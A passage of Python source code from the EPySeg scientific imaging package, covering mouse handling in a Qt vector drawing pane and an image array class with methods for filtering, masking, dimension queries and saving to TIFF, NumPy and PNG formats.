# only draw shapes if they are visible --> requires a visiblerect to be passed
if visibleRect is not None:
# only draws if in visible rect
if shape.boundingRect().intersects(QRectF(visibleRect)):
shape.draw(painter)
else:
shape.draw(painter)
if self.currently_drawn_shape is not None:
if self.currently_drawn_shape.isSet:
self.currently_drawn_shape.draw(painter)
sel = self.create_master_rect()
if sel is not None:
painter.drawRect(sel)
painter.restore()
def group_contains(self, x, y):
# checks if master rect for group contains click
# get bounds and create union and compare
master_rect = self.create_master_rect()
if master_rect is None:
return False
return master_rect.contains(QPointF(x, y))
def create_master_rect(self):
master_rect = None
if self.selected_shape:
for shape in self.selected_shape:
if master_rect is None:
master_rect = shape.boundingRect()
else:
master_rect = master_rect.united(shape.boundingRect())
return master_rect
def removeCurShape(self):
if self.selected_shape:
self.shapes = [e for e in self.shapes if e not in self.selected_shape]
self.selected_shape = []
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.drawing = True
self.lastPoint = event.pos() / self.scale
self.firstPoint = event.pos() / self.scale
shapeFound = False
if self.currently_drawn_shape is None:
for shape in reversed(self.shapes):
if shape.contains(self.lastPoint) and not shape in self.selected_shape:
logger.debug('you clicked shape:' + str(shape))
if event.modifiers() == QtCore.Qt.ControlModifier:
if shape not in self.selected_shape: # avoid doublons
self.selected_shape.append(shape) # add shape to group
logger.debug('adding shape to group')
shapeFound = True
else:
if not self.group_contains(self.lastPoint.x(), self.lastPoint.y()):
self.selected_shape = [shape]
logger.debug('only one element is selected')
shapeFound = True
return
if not shapeFound and event.modifiers() == QtCore.Qt.ControlModifier:
for shape in reversed(self.shapes):
if shape.contains(self.lastPoint):
if shape in self.selected_shape: # avoid doublons
logger.debug('you clicked again shape:' + str(shape))
self.selected_shape.remove(shape) # add shape to group
logger.debug('removing a shape from group')
shapeFound = True
# no shape found --> reset sel
if not shapeFound and not self.group_contains(self.lastPoint.x(), self.lastPoint.y()):
logger.debug('resetting sel')
self.selected_shape = []
# check if a shape is selected and only move that
if self.drawing_mode and not self.selected_shape and self.currently_drawn_shape is None:
# do not reset shape if not done drawing...
if self.shape_to_draw is not None:
self.currently_drawn_shape = self.shape_to_draw()
else:
self.currently_drawn_shape = None
if self.drawing_mode and not self.selected_shape:
if self.currently_drawn_shape is not None:
self.currently_drawn_shape.set_P1(QPointF(self.lastPoint.x(), self.lastPoint.y()))
def mouseMoveEvent(self, event):
if event.buttons() and QtCore.Qt.LeftButton:
if self.selected_shape and self.currently_drawn_shape is None:
logger.debug('moving' + str(self.selected_shape))
for shape in self.selected_shape:
shape.translate(event.pos() / self.scale - self.lastPoint)
if self.currently_drawn_shape is not None:
self.currently_drawn_shape.add(self.firstPoint, self.lastPoint)
self.lastPoint = event.pos() / self.scale
def mouseReleaseEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.drawing = False
if self.drawing_mode and self.currently_drawn_shape is not None:
self.currently_drawn_shape.add(self.firstPoint, self.lastPoint)
if isinstance(self.currently_drawn_shape, Freehand2D):
# this closes the freehand shape
self.currently_drawn_shape.add(self.lastPoint, self.firstPoint)
# should not erase the shape if it's a polyline or a polygon by the way
if not isinstance(self.currently_drawn_shape, PolyLine2D) and not isinstance(self.currently_drawn_shape, Polygon2D):
self.shapes.append(self.currently_drawn_shape)
self.currently_drawn_shape = None
def mouseDoubleClickEvent(self, event):
if isinstance(self.currently_drawn_shape, PolyLine2D) or isinstance(self.currently_drawn_shape, Polygon2D):
self.shapes.append(self.currently_drawn_shape)
self.currently_drawn_shape = None
if __name__ == '__main__':
VectorialDrawPane()
```
#### File: EPySeg/epyseg/img.py
```python
from epyseg.tools.logger import TA_logger
logger = TA_logger() # logging_level=TA_logger.DEBUG
import random
import os
import read_lif # read Leica .lif files (requires numexpr)
from builtins import super, int
import warnings
import skimage
from skimage import io
from PIL import Image
import tifffile # open Zeiss .tif and .lsm files
import czifile # open .czi spim files
import glob
from skimage.transform import rescale
from skimage.util import img_as_ubyte
import scipy.signal # convolution of images
import numpy as np
import json
from PyQt5.QtGui import QImage, QColor # allows for qimage creation
from natsort import natsorted # sort strings as humans would do
import xml.etree.ElementTree as ET # to handle xml metadata of images
import base64
import io
import matplotlib.pyplot as plt
import traceback
from skimage.morphology import white_tophat, black_tophat, disk
from skimage.morphology import square, ball, diamond, octahedron, rectangle
# for future development
# np = None
# try:
# np = __import__('cupy') # 3d accelerated numpy
# except:
# np = __import__('numpy')
def RGB_to_int24(RGBimg):
RGB24 = (RGBimg[..., 0].astype(np.uint32) << 16) | (RGBimg[..., 1].astype(np.uint32) << 8) | RGBimg[..., 2].astype(
np.uint32)
return RGB24
def int24_to_RGB(RGB24):
RGBimg = np.zeros(shape=(*RGB24.shape, 3), dtype=np.uint8)
for c in range(RGBimg.shape[-1]):
RGBimg[..., c] = (RGB24 >> ((RGBimg.shape[-1] - c - 1) * 8)) & 0xFF
return RGBimg
# work in progress please don't use
# marche mais sombre --> faudrait plutot du alphacomposite, je pense que c'est plus ce que je veux
# TODO maybe also use a mask --> for example exclude all black/0 bg pixels
# belnded = __create_composite(bg,fg,0.1)
# pas mal mais aussi essayer composite
def __create_composite(background, foreground, mask, alpha=0.3):
# print(background.shape, background.dtype)
# print(foreground.shape, foreground.dtype)
# to blend the images need be single channels
bg = background
if not isinstance(bg, Image.Image):
if bg.dtype == np.dtype(np.float32):
# there is a bug in normalization or in image as ubyte --> because the final image is almost completely blaxk
bg = Img.normalization(bg, method='Rescaling (min-max normalization)', range=[0,1], clip=True)
# Img(bg, dimensions='hw').save('/D/Sample_images/segmentation_assistant/ovipo_uncropped/trash_me_norm.tif')
#
# print(bg.dtype, bg.max(), bg.min()) # there is a bug there --> need fix it rapidly
# bg = img_as_ubyte(bg) --> bug here the conversion is terrible all signal is lost --> do it manually
bg = (bg*255).astype(np.uint8)
# print(bg.shape, bg.dtype, bg.max(), bg.min())
# why is that all black ???
# Img(bg, dimensions='hw').save('/D/Sample_images/segmentation_assistant/ovipo_uncropped/trash_me.tif')
# bg = (bg/bg.max())*255
# bg = bg.astype(np.uint8) # dirty ... do that better --> TODO
bg = Image.fromarray(bg)
# bg.show()
fg = foreground
if not isinstance(fg, Image.Image):
if fg.dtype == np.dtype(np.float32):
fg = Img.normalization(fg, method='Rescaling (min-max normalization)', range=[0, 1], clip=True)
fg = (fg * 255).astype(np.uint8)
# fg = img_as_ubyte(fg)
# fg = (fg/fg.max())*255
# fg = fg.astype(np.uint8) # dirty ... do that better --> TODO
fg = Image.fromarray(fg)
# TODO also try composite because that maybe what I want to have in fact
# Image.composite
# Image.alpha_composite --> maybe exactly what I want or code my own version in pure numpy --> that would be useful
# https://pillow.readthedocs.io/en/stable/reference/Image.html#PIL.Image.Image.convert
# print('bg.mode',bg.mode)
# print('fg.mode',fg.mode)
# Image.convert
if bg.mode != fg.mode:
# images are incompatible --> need convert one or the other to the other type
if bg.mode == 'RGB' or fg.mode == 'RGB':
if bg.mode == 'L' or bg.mode == 'F':
bg = bg.convert(mode="RGB")
# print('bg.mode', bg.mode)
if fg.mode == 'L' or fg.mode == 'F':
fg = fg.convert(mode="RGB")
# composite fraction assume 8 bits?
bg.putalpha(255)
fg.putalpha(int(alpha*255))
# print('bg.mode', bg.mode)
# print('fg.mode', fg.mode)
# result = Image.blend(bg,fg, alpha=alpha)
# result = Image.alpha_composite(bg,fg)
# NB mask need be a PIL image too --> all of this is so slow and so many conversions ...
if mask is not None:
result = Image.composite(bg,fg, mask) # ignore pure black pixels #TODO handle masks
else:
result = Image.alpha_composite(bg, fg)
return result # nb this is a PIL image --> do I want to make it directly as a numpy array ???
# somehow tophat does not work for 3D but why ???
def get_nb_of_series_in_lif(lif_file_name):
if not lif_file_name or not lif_file_name.lower().endswith('.lif'):
logger.error('Error only lif file supported')
return None
reader = read_lif.Reader(lif_file_name)
series = reader.getSeries()
return len(series)
# TODO maybe make one that does the same with ROIs ???
# if return mask then I just return the mask with boolean and not the
def mask_rows_or_columns(img, spacing_X=2, spacing_Y=None, masking_value=0, return_boolean_mask=False,
initial_shiftX=0, initial_shiftY=0, random_start=False): # , dimension_h=-2, dimension_w=-1
if isinstance(img, tuple):
mask = np.zeros(img, dtype=np.bool)
else:
mask = np.zeros(img.shape, dtype=np.bool)
if mask.ndim < 3: # assume no channel so add one
mask = mask[..., np.newaxis]
if spacing_X is not None:
if spacing_X <= 1:
spacing_X = None
if spacing_Y is not None:
if spacing_Y <= 1:
spacing_Y = None
if initial_shiftX == 0 and initial_shiftY == 0 and random_start:
if spacing_X is not None:
initial_shiftX = random.randint(0, spacing_X)
if spacing_Y is not None:
initial_shiftY = random.randint(0, spacing_Y)
# assume all images are with a channel --> probably the best way to do things
for c in range(mask.shape[-1]):
if spacing_Y is not None:
if mask.ndim > 3:
mask[..., initial_shiftY::spacing_Y, :, c] = True
else:
mask[initial_shiftY::spacing_Y, :, c] = True
if spacing_X is not None:
mask[..., initial_shiftX::spacing_X, c] = True
if return_boolean_mask or isinstance(img, tuple):
return mask
if img.ndim < 3: # assume no channel so add one
img = img[..., np.newaxis]
# apply mask to image
img[mask] = masking_value
return img
# TODO in development --> code that better and check whether it keeps the intensity range or not
def resize(img, new_size, order=1):
from skimage.transform import resize
img = resize(img, new_size, order=1)
return img
# nb there seems to be a bug in white top hat --> infinite loop or bug ???
def __top_hat(image, type='black', structuring_element=square(50), preserve_range=True):
logger.debug('bg subtraction ' + str(type) + '_top_hat')
try:
# TODO crappy bug fix for 3D images in tensorflow --> need some more love
# TODO NB will only work for tensorflow like images or maybe always load and treat images as in tensorflow by adding 1 for channel dimension even if has only one channel?? --> MAY MAKE SENSE
# for some reason top hat does not work with 3D images --> why --> in fact that does work but if image is very noisy and filter is big then it does nothing
if len(image.shape) == 4:
out = np.zeros_like(image) # , dtype=image.dtype
for zpos, zimg in enumerate(image):
for ch in range(zimg.shape[-1]):
out[zpos, ..., ch] = __top_hat_single_channel__(zimg[..., ch], type=type,
structuring_element=structuring_element,
preserve_range=preserve_range)
return out
elif len(image.shape) == 3:
out = np.zeros_like(image) # , dtype=image.dtype
for ch in range(image.shape[-1]):
out[..., ch] = __top_hat_single_channel__(image[..., ch], type=type,
structuring_element=structuring_element,
preserve_range=preserve_range)
return out
elif len(image.shape) == 2:
out = __top_hat_single_channel__(image, type=type, structuring_element=structuring_element,
preserve_range=preserve_range)
return out
else:
print('invalid shape --> ' + type + ' top hat failed, sorry...')
except:
print(str(type) + ' top hat failed, sorry...')
traceback.print_exc()
return image
def black_top_hat(image, structuring_element=square(50), preserve_range=True):
return __top_hat(image, type='black', structuring_element=structuring_element, preserve_range=preserve_range)
def white_top_hat(image, structuring_element=square(50), preserve_range=True):
return __top_hat(image, type='white', structuring_element=structuring_element, preserve_range=preserve_range)
def __top_hat_single_channel__(single_channel_image, type, structuring_element=square(50), preserve_range=True):
dtype = single_channel_image.dtype
min = single_channel_image.min()
max = single_channel_image.max()
if type == 'white':
out = white_tophat(single_channel_image, structuring_element)
else:
out = black_tophat(single_channel_image, structuring_element)
# TODO NB check if correct also
if preserve_range and (out.min() != min or out.max() != max):
out = out / out.max()
out = (out * (max - min)) + min
out = out.astype(dtype)
return out
class Img(np.ndarray): # subclass ndarray
background_removal = ['No', 'White bg', 'Dark bg']
# see https://en.wikipedia.org/wiki/Feature_scaling
normalization_methods = ['Rescaling (min-max normalization)', 'Standardization (Z-score Normalization)',
'Mean normalization', 'Max normalization (auto)', 'Max normalization (x/255)',
'Max normalization (x/4095)', 'Max normalization (x/65535)',
'Rescaling based on defined lower and upper percentiles',
'None'] # should I add vgg, etc for pretrained encoders ??? maybe put synonyms
normalization_ranges = [[0, 1], [-1, 1]]
clipping_methods = ['ignore outliers', '+', '+/-', '-']
# TODO allow load list of images all specified as strings one by one
# TODO allow virtual stack --> open only one image at a time from a series, can probably do that with text files
def __new__(cls, *args, t=0, d=0, z=0, h=0, y=0, w=0, x=0, c=0, bits=8, serie_to_open=None, dimensions=None,
metadata=None, **kwargs) -> object:
'''Creates a new instance of the Img class
The image class is a numpy ndarray. It is nothing but a matrix of pixel values.
Parameters
----------
t : int
number of time points of the image
d, z : int
number of z stacks of an image
h, y : int
image height
w, x : int
image width
c : int
number of color channels
bits : int
bits per pixel
dimensions : string
order and name of the dimensions of the image
metadata : dict
dict containing metadata entries and their corresponding values
'''
img = None
meta_data = {'dimensions': None, # image dimensions
'bits': None, # bits per pixel
'vx': None, # voxel x size
'vy': None, # voxel y size
'vz': None, # voxel z size
'AR': None, # wh/depth ratio
'LUTs': None, # lut
'cur_d': 0, # current z/depth pos
'cur_t': 0, # current time
'Overlays': None, # IJ overlays
'ROI': None, # IJ ROIs
}
if metadata is not None:
# if user specified some metadata update them
meta_data.update(metadata)
else:
# recover old metadata from original image # is that the correct way
if isinstance(args[0], Img):
try:
meta_data.update(args[0].metadata)
except:
pass
if len(args) == 1:
# case 1: Input array is an already an ndarray
if isinstance(args[0], np.ndarray):
img = np.asarray(args[0]).view(cls)
img.metadata = meta_data
if dimensions is not None:
img.metadata['dimensions'] = dimensions
elif isinstance(args[0], str):
logger.debug('loading ' + str(args[0]))
# print('loading '+str(args[0]))
# input is a string, i.e. a link to one or several files
if '*' not in args[0]:
# single image
meta, img = ImageReader.read(args[0], serie_to_open=serie_to_open)
meta_data.update(meta)
meta_data['path'] = args[0] # add path to metadata
img = np.asarray(img).view(cls)
img.metadata = meta_data
else:
# series of images
image_list = [img for img in glob.glob(args[0])]
image_list = natsorted(image_list)
img = ImageReader.imageread(image_list) # TODO add metadata here too for w,h d and channels
meta_data['path'] = args[0] ## add path to metadata
img = np.asarray(img).view(cls)
img.metadata = meta_data
else:
# custom image creation : setting the dimensions
dims = []
dimensions = []
if t != 0:
dimensions.append('t')
dims.append(t)
if z != 0 or d != 0:
dimensions.append('d')
dims.append(max(z, d))
if h != 0 or y != 0:
dimensions.append('h')
dims.append(max(h, y))
if w != 0 or x != 0:
dimensions.append('w')
dims.append(max(w, x))
if c != 0:
dimensions.append('c')
dims.append(c)
dimensions = ''.join(dimensions)
meta_data['dimensions'] = dimensions # add dimensions to metadata
dtype = np.uint8 # default is 8 bits
if bits == 16:
dtype = np.uint16 # 16 bits
if bits == 32:
dtype = np.float32 # 32 bits
meta_data['bits'] = bits
img = np.asarray(np.zeros(tuple(dims), dtype=dtype)).view(cls)
# array = np.squeeze(array) # TODO may be needed especially if people specify 1 instead of 0 ??? but then need remove some stuff
# img = array
img.metadata = meta_data
if img is None:
# TODO do that better
logger.critical(
"Error, can't open image invalid arguments, file not supported or file does not exist...") # TODO be more precise
return None
return img
# TODO do implement it more wisely or drop it because it's simpler to access the numpy array directly...
def get_pixel(self, *args):
'''get pixel value
TODO
'''
if len(args) == self.ndim:
return self[tuple(args)]
logger.critical('wrong nb of dimensions')
return None
# TODO do implement it more wisely or drop it because it's simpler to access the numpy array directly...
def set_pixel(self, x, y, value):
'''sets pixel value
TODO
'''
# if len(args) == self.ndim:
self[x, y] = value
def get_dimension(self, dim):
'''gets the specified image dimension length
Parameters
----------
dim : single char string
dimension of interest
Returns
-------
int
dimension length
'''
# force dimensions compatibility (e.g. use synonyms)
if dim == 'z':
dim = 'd'
elif dim == 'x':
dim = 'w'
elif dim == 'y':
dim = 'h'
elif dim == 'f':
dim = 't'
if self.metadata['dimensions'] is None:
logger.error('dimension ' + str(dim) + ' not found!!!')
return None
if dim in self.metadata['dimensions']:
idx = self.metadata['dimensions'].index(dim)
idx = idx - len(self.metadata['dimensions'])
if self.ndim >= abs(idx) >= 1:
return self.shape[idx]
else:
logger.error('dimension ' + str(dim) + ' not found!!!')
return None
else:
logger.error('dimension ' + str(dim) + ' not found!!!')
return None
def get_dimensions(self):
'''gets the length of all dimensions
Returns
-------
dict
a dict containing dimension name along with its length
'''
dimension_parameters = {}
for d in self.metadata['dimensions']:
dimension_parameters[d] = self.get_dimension(d)
return dimension_parameters
def get_dim_idx(self, dim):
# force dimensions compatibility (e.g. use synonyms)
if dim == 'z':
dim = 'd'
elif dim == 'x':
dim = 'w'
elif dim == 'y':
dim = 'h'
elif dim == 'f':
dim = 't'
if not dim in self.metadata['dimensions']:
return None
return self.metadata['dimensions'].index(dim)
# TODO code this better
def pop(self, pause=1, lut='gray', interpolation=None, show_axis=False, preserve_AR=True):
'''pops up an image using matplot lib
Parameters
----------
pause : int
time the image should be displayed
interpolation : string or None
interpolation for image display (e.g. 'bicubic', 'nearest', ...)
show_axis : boolean
TODO
preserve_AR : boolean
keep image AR upon display
'''
if self.ndim > 3:
logger.warning("too many dimensions can't pop image")
return
plt.ion()
plt.axis('off')
plt.margins(0)
plt.clf()
plt.axes([0, 0, 1, 1])
ax = plt.gca()
ax.get_xaxis().set_visible(False) # this removes the ticks and numbers for x axis
ax.get_yaxis().set_visible(False)
ax.margins(0)
if self.ndim == 3 and self.shape[2] <= 2:
# create a 3 channel array from the 2 channel array image provided
rgb = np.concatenate(
(self[..., 0, np.newaxis], self[..., 1, np.newaxis], np.zeros_like(self[..., 0, np.newaxis])), axis=-1)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.imshow(img_as_ubyte(rgb), interpolation=interpolation)
# logger.debug("popping image method 1")
else:
if self.ndim == 2:
# if image is single channel display it as gray instead of with a color lut by default
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.imshow(img_as_ubyte(self), cmap=lut, interpolation=interpolation) # self.astype(np.uint8)
# logger.debug("popping image method 2")
else:
# split channels if more than 3 channels maybe or remove the alpha channel ??? or not ??? see how to do that
if self.shape[2] == 3:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.imshow(img_as_ubyte(self),
interpolation=interpolation)
# logger.debug("popping image method 3")
else:
for c in range(self.shape[2]):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
plt.imshow(img_as_ubyte(self[:, :, c]), cmap=lut, interpolation=interpolation)
if c != self.shape[2] - 1:
plt.show()
plt.draw()
plt.pause(pause)
# logger.debug("popping image method 4")
if not preserve_AR:
ax.axis('tight') # required to preserve AR but this necessarily adds a bit of white around the image
ax.axis('off')
plt.show()
plt.draw()
plt.pause(pause)
def setBorder(self, distance_from_border_in_px=1, color=0):
''' Set n pixels at the border of the image to the defined color
Parameters
----------
distance_from_border_in_px : int
Distance in pixels from the borders of the image.
color : int or tuple
new color (default is black = 0)
'''
if distance_from_border_in_px <= 0:
# ignore when distance < 0
return
val = color
if self.has_c() and self.get_dimension('c') > 1 and not isinstance(color, tuple):
# convert int color to tuple when tuple is required, i.e. when an img has several channels
val = tuple([color] * self.get_dimension('c'))
all_dims_before_hwc = []
for d in self.metadata['dimensions']: # keep all dimensions before hwc unchanged
if d not in ['w', 'h', 'c', 'x', 'y']:
all_dims_before_hwc.append(slice(None))
# recolor the border
for v in range(distance_from_border_in_px):
all_dims_before_hwc.append(slice(None))
all_dims_before_hwc.append(v)
self[tuple(all_dims_before_hwc)] = val
all_dims_before_hwc = all_dims_before_hwc[:-2]
all_dims_before_hwc.append(v)
all_dims_before_hwc.append(slice(None))
self[tuple(all_dims_before_hwc)] = val
all_dims_before_hwc = all_dims_before_hwc[:-2]
all_dims_before_hwc.append(-(v + 1))
all_dims_before_hwc.append(slice(None))
self[tuple(all_dims_before_hwc)] = val
all_dims_before_hwc = all_dims_before_hwc[:-2]
all_dims_before_hwc.append(slice(None))
all_dims_before_hwc.append(-(v + 1))
self[tuple(all_dims_before_hwc)] = val
all_dims_before_hwc = all_dims_before_hwc[:-2]
# TODO in fact that is more complex I should not donwsample the channel or color dimension nor the time dimension --> so I need many more parameters and controls --> quite good already but finalize that later
def downsample(self, dimensions_to_downsample, downsampling_factor=2):
'''Downsamples an image along the specified dimension by the specified factor
Parameters
----------
dimensions_to_downsample : string
chars representing the dimension to downsample
downsampling_factor : int
downsampling factor
Returns
-------
ndarray
a downsampled image
'''
if downsampling_factor == 1:
logger.error("downsampling with a factor = 1 means no downsampling, thereby ignoring...")
return self
if self.metadata['dimensions'] is None:
logger.error("Image dimensions not specified!!!")
return self
idx = None
for dim in self.metadata['dimensions']:
if dim in dimensions_to_downsample:
if idx is None:
idx = np.index_exp[::downsampling_factor]
else:
idx += np.index_exp[::downsampling_factor]
else:
if idx is None:
idx = np.index_exp[:]
else:
idx += np.index_exp[:]
if idx is None:
return self
return self[idx]
def rescale(self, factor=2):
'''rescales an image (using scipy)
Parameters
----------
factor : int
rescaling factor
Returns
-------
ndarray
a rescaled image
'''
return skimage.transform.rescale(self, 1. / factor, preserve_range=True, anti_aliasing=False, multichannel=True)
# ideally should make it return an image but maybe too complicated --> ok for now let's wait for my python skills to improve
def convolve(self, kernel=np.array([[-1, -1, -1],
[-1, 8, -1],
[-1, -1, -1]])):
'''convolves an image (using scipy)
Parameters
----------
kernel : np.array
a convolution kernel
Returns
-------
ndarray
a convolved image
'''
convolved = scipy.signal.convolve2d(self, kernel, 'valid')
return convolved
def has_dimension(self, dim):
'''Returns True if image has the specified dimension, False otherwise
Parameters
----------
dim : single char string
dimension of interest
Returns
-------
boolean
True if dimension of interest exist in image
'''
# use dimension synonyms
if dim == 'x':
dim = 'w'
if dim == 'y':
dim = 'h'
if dim == 'z':
dim = 'd'
if dim in self.meta_data['dimensions']:
return True
return False
def is_stack(self):
'''returns True if image has a z/d dimension, False otherwise
'''
return self.has_d()
def has_channels(self):
'''returns True if image has a c dimension, False otherwise
'''
return self.has_c()
def get_t(self, t):
'''returns an image at time t, None otherwise
Parameters
----------
t : int
time point of interest
Returns
-------
ndarray
image at time t or None
'''
if not self.is_time_series():
return None
if t < self.get_dimension('t'): # TODO check code
return self.imCopy(t=t)
return None
# set the current time frame
def set_t(self, t):
self.metadata['cur_t'] = t
def get_d_scaling(self):
'''gets the z/d scaling factor for the current image
Returns
-------
float
the depth scaling factor
'''
return self.z_scale
def set_d_scaling(self, scaling_factor):
'''sets the z/d scaling factor for the current image
Parameters
----------
scaling_factor : float
the new image scaling factor
'''
self.z_scale = scaling_factor
def has_t(self):
'''returns True if the image is a time series, False otherwise
'''
return self.has_dimension('t')
def is_time_series(self):
'''returns True if the image is a time series, False otherwise
'''
return self.has_t()
def has_d(self):
'''returns True if the image is a Z-stack, False otherwise
'''
return self.has_dimension('d') or self.has_dimension('z')
def has_dimension(self, d):
'''returns True if the image has the specified dimension, False otherwise
Parameters
----------
dim : single char string
dimension of interest
Returns
-------
boolean
True if dim exists
'''
return d in self.metadata['dimensions']
# check for the presence of LUTs
def has_LUTs(self):
return 'LUTs' in self.metadata and self.metadata['LUTs'] is not None
# get LUTs
def get_LUTs(self):
if 'LUTs' in self.metadata:
return self.metadata['LUTs']
return None
# set LUTs
def set_LUTs(self, LUTs):
self.metadata['LUTs'] = LUTs
def has_c(self):
'''returns True if the image has color channels, False otherwise
'''
return 'c' in self.metadata['dimensions']
def _create_dir(self, output_name):
# create dir if does not exist
if output_name is None:
return
output_folder, filename = os.path.split(output_name)
# bug fix in case just a filename and no parent folder
if output_folder:
os.makedirs(output_folder, exist_ok=True)
@staticmethod
def img2Base64(img):
# save it as png and encode it
if img is not None:
# assume image
buf = io.BytesIO()
im = Image.fromarray(img)
im.save(buf, format='png')
buf.seek(0) # rewind file
figdata_png = base64.b64encode(buf.getvalue()).decode("utf-8")
buf.close()
return figdata_png
else:
# assume pyplot image then
print('Please call this before plt.show() to avoid getting a blank output')
buf = io.BytesIO()
plt.savefig(buf, format='png', bbox_inches='tight') # TO REMOVE UNNECESSARY WHITE SPACE AROUND GRAPH...
buf.seek(0) # rewind file
figdata_png = base64.b64encode(buf.getvalue()).decode("utf-8")
buf.close()
return figdata_png
# mode can be IJ or raw --> if raw --> set IJ to false and save directly TODO clean the mode and mode is only for tif so far --> find a way to make it better and more optimal --> check also how mode would behave with z stacks, etc...
def save(self, output_name, print_file_name=False, ijmetadata='copy', mode='IJ'):
'''saves the current image
Parameters
----------
output_name : string
name of the file to save
'''
if print_file_name:
print('saving', output_name)
if output_name is None:
logger.error("No output name specified... ignoring...")
return
# TODO maybe handle tif with stars in their name here to avoid loss of data but ok for now...
if not '*' in output_name and (output_name.lower().endswith('.tif') or output_name.lower().endswith('.tiff')):
self._create_dir(output_name)
if mode != 'IJ': # TODO maybe do a TA mode or alike instead...
out = self
tifffile.imwrite(output_name, out)
else:
# create dir if does not exist
out = self
# apparently int type is not supported by IJ
if out.dtype == np.int32:
out = out.astype(np.float32) # TODO check if correct with real image but should be
if out.dtype == np.int64:
out = out.astype(np.float64) # TODO check if correct with real image but should be
# IJ does not support bool type too
if out.dtype == np.bool:
out = out.astype(np.uint8) * 255
if out.dtype == np.double:
out = out.astype(np.float32)
# if self.has_c():
# if not self.has_d() and self.has_t():
# out = np.expand_dims(out, axis=-1)
# out = np.moveaxis(out, -1, 1)
# out = np.moveaxis(out, -1, -3)
# tifffile.imwrite(output_name, out, imagej=True) # make the data compatible with IJ
# else:
# # most likely a big bug here --> fix it --> if has d and no t does it create a bug ???? --> maybe
# if not self.has_d() and self.has_t():
# out = np.expand_dims(out, axis=-1)
# out = np.moveaxis(out, -1, 1)
# out = np.expand_dims(out, axis=-1)
# # reorder dimensions in the IJ order
# out = np.moveaxis(out, -1, -3)
# tifffile.imwrite(output_name, out, imagej=True) # this is the way to get the data compatible with IJ
# should work better now and fix several issues... but need test it with real images
# if image has no c --> assume all ok
if self.metadata['dimensions'] is not None:
# print('in dims')
# print(self.has_c()) # why has no c channel ???
if not self.has_c():
out = out[..., np.newaxis]
if not self.has_d():
out = out[np.newaxis, ...]
if not self.has_t():
out = out[np.newaxis, ...]
else:
# print('othyer')
# no dimension specified --> assume always the same order that is tzyxc --> TODO maybe ...tzyxc
if out.ndim < 3:
out = out[..., np.newaxis]
if out.ndim < 4:
out = out[np.newaxis, ...]
if out.ndim < 5:
out = out[np.newaxis, ...]
# print('final', out.shape)
out = np.moveaxis(out, -1, -3) # need move c channel before hw (because it is default IJ style)
# TODO maybe offer compression at some point to gain space ???
# imageJ order is TZCYXS order with dtype is uint8, uint16, or float32. Is S a LUT ???? probably yes because (S=3 or S=4) must be uint8. can I use compression with ImageJ's Bio-Formats import function.
# TODO add the possibility to save ROIs if needed...
# Parameters 'append', 'byteorder', 'bigtiff', and 'imagej', are passed # to TiffWriter(). Other parameters are passed to TiffWriter.save().
# print(ijmetadata)
rois = {}
if ijmetadata == 'copy' and self.metadata['Overlays']:
rois['Overlays'] = self.metadata['Overlays']
if ijmetadata == 'copy' and self.metadata['ROI']:
rois['ROI'] = self.metadata['ROI']
if not rois:
rois = None
# quick hack to force images to display as composite in IJ if they have channels -> probably needs be improved at some point
# try:
tifffile.imwrite(output_name, out, imagej=True, ijmetadata=rois,
metadata={'mode': 'composite'} if self.metadata[
'dimensions'] is not None and self.has_c() else {}) # small hack to keep only non RGB images as composite and self.get_dimension('c')!=3
# TODO at some point handle support for RGB 24-32 bits images saving as IJ compatible but skip for now
# nb tifffile.imwrite(os.path.join(filename0_without_ext,'tra_test_saving_24bits_0.tif'), tracked_cells_t0, imagej=True, metadata={}) --> saves as RGB if image RGB 3 channels
# TODO --> some day do the saving smartly with the dimensions included see https://pypi.org/project/tifffile/
# imwrite('temp.tif', data, bigtiff=True, photometric='minisblack', compression = 'deflate', planarconfig = 'separate', tile = (32, 32), metadata = {'axes': 'TZCYX'})
# imwrite('temp.tif', volume, imagej=True, resolution=(1. / 2.6755, 1. / 2.6755), metadata = {'spacing': 3.947368, 'unit': 'um', 'axes': 'ZYX'})
else:
if output_name.lower().endswith('.npy') or output_name.lower().endswith('.epyseg'):
# directly save as .npy --> the numpy default array format
self._create_dir(output_name)
np.save(output_name, self,
allow_pickle=False) # set allow pickle false to avoid pbs as pickle is by def not stable
if self.metadata is not None and 'times' in self.metadata.keys():
times = self.metadata['times']
# force serialisation of times
self.metadata['times'] = str(times)
with open(output_name + '.meta', 'w') as outfile:
json.dump(self.metadata, outfile)
# restore time metadata
self.metadata['times'] = times
# print('exporting metadata', self.metadata) # metadata is not set --> too bad --> why
# np.savez_compressed(output_name, self ) allow_pickle=False {'allow_pickle':False} --> maybe pass that
return
# the huge pb with this is that it is not portable --> because it necessarily uses pickle --> very dangerous save and too bad cause would allow saving metadata easily if passed as an array...
if output_name.lower().endswith('.npz'):
# directly save as .npy --> the numpy default array format
self._create_dir(output_name)
# VERY GOOD IDEA TODO data is saved as data.npy inside the npz --> could therefore also save metadata ... --> VERY GOOD IDEA
np.savez_compressed(output_name,
data=self) # set allow pickle false to avoid pbs as pickle is by def not stable
return
if not '*' in output_name and (self.has_t() or self.has_d()):
logger.warning(
"image is a stack and cannot be saved as a single image use a geneic name like /path/to/img*.png instead")
return
else:
self._create_dir(output_name)
if not self.has_t() and not self.has_d():
new_im = Image.fromarray(self)
new_im.save(output_name)
self.save_IJ_ROIs_or_overlays(output_name)
# try save IJ ROIs and overlays if they exist
else:
# TODO recode below to allow any number of dimensions
if self.has_t():
t_counter = 0
# loop over all times of the image
for t in self[:]:
z_counter = 0
# loop over all z of the image
for z in t[:]:
if z.ndim == 3 and z.shape[2] <= 2:
# create a 3 channel array from the 2 channel array image provided
z = np.concatenate((z[..., 0, np.newaxis], z[..., 1, np.newaxis],
np.zeros_like(z[..., 0, np.newaxis])), axis=-1)
with warnings.catch_warnings(): # force it to be 8 bits for these formats
warnings.simplefilter('ignore')
z = img_as_ubyte(z)
new_im = Image.fromarray(z)
new_im.save(output_name.replace('*', 't{:03d}_z{:04d}'.format(t_counter,
z_counter))) # replace * by tover 3 digit and z over 4 digits
z_counter += 1
t_counter += 1
self.save_IJ_ROIs_or_overlays(output_name)
elif self.has_d():
# loop over all z of the image
z_counter = 0
for z in self[:]:
if z.ndim == 3 and z.shape[2] <= 2:
# create a 3 channel array from the 2 channel array image provided
